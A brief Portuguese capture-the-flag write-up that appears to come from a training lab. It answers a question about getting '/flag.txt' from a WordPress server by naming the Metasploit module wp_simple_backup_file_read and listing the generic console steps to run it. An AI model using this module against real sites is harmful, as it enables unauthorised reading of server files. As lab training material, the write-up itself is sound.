Questões

  1. Tente identificar os serviços em execução no servidor acima e, em seguida, tente pesquisar para encontrar exploits públicos para explorá-los. Depois de fazer isso, tente obter o conteúdo do arquivo '/flag.txt'. (observação: o servidor web pode levar alguns segundos para iniciar)

  • Visitamos a página web, e notamos que o site usa o CMS do wordpress

  • Pesquisamos pela versão, e encontramos uma exploração da vulnerabilidade no metasploit

msf > use auxiliary/scanner/http/wp_simple_backup_file_read
msf auxiliary(wp_simple_backup_file_read) > show actions
    ...actions...
msf auxiliary(wp_simple_backup_file_read) > set ACTION < action-name >
msf auxiliary(wp_simple_backup_file_read) > show options
    ...show and set options...
msf auxiliary(wp_simple_backup_file_read) > run

Last updated